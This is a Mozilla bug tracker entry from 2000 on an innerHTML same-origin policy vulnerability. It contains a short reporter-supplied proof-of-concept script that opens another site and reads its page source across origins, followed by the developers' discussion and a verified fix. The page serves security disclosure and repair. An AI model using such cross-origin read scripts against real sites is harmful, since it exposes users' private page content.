Closed Bug 39083 Opened 24 years ago Closed 24 years ago

innerHTML vulnerability

Categories

(Core :: Security, defect, P3)

Product:
Core
Component:
Security
Type:
defect

Tracking

()

Status:
VERIFIED FIXED

People

(Reporter: security-bugs, Assigned: security-bugs)

References

(
URL
)

Details

(Whiteboard: [nsbeta2+])

Date: Fri, 12 May 2000 15:35:59 +0300 From: Georgi Guninski <joro@nat.bg> To: Mitchell Stoltz <mstoltz@netscape.com> The innerHTML property is not protected by Same Origin security policy. This allows reading arbitrary documents that have images (probably all other also). The code is: -------------------------------------------------- <SCRIPT> a=window.open("http://www.yahoo.com"); function f() { alert("Here is the source of Yahoo: "+a.document.images[0].offsetParent.innerHTML); } setTimeout("f()",5000); </SCRIPT> --------------------------------------------------
Marking nsbeta2. Created testcase, in URL field above. Need to add security check. I'd like to consider Georgi's suggestion that we set access to ALL DOM properties to same-origin by default. This will save us having to inspect each one of these properties for vulnerabilities such as this one. Is this feasible? Will it break things? I think this is the policy IE uses. CCing DOM folks.
URL: http://warp/u/mstoltz/tests/39083.html
Status: NEW → ASSIGNED
Keywords: nsbeta2
Target Milestone: --- → M17
What prevents the page from simply doing a.document.innerHTML? Should it even be able to get as far as a.document.images[0]? (i agree that restricting access is a good default)
Putting on [nsbeta2+] radar for beta2 fix.
Whiteboard: [nsbeta2+]
Fix checked in. Added security check for this porperty to all.js.
Status: ASSIGNED → RESOLVED
Closed: 24 years ago
Resolution: --- → FIXED
Verified per mstoltz' comments.
Status: RESOLVED → VERIFIED
Target Milestone: M17 → M16
You need to log in before you can comment on or make changes to this bug.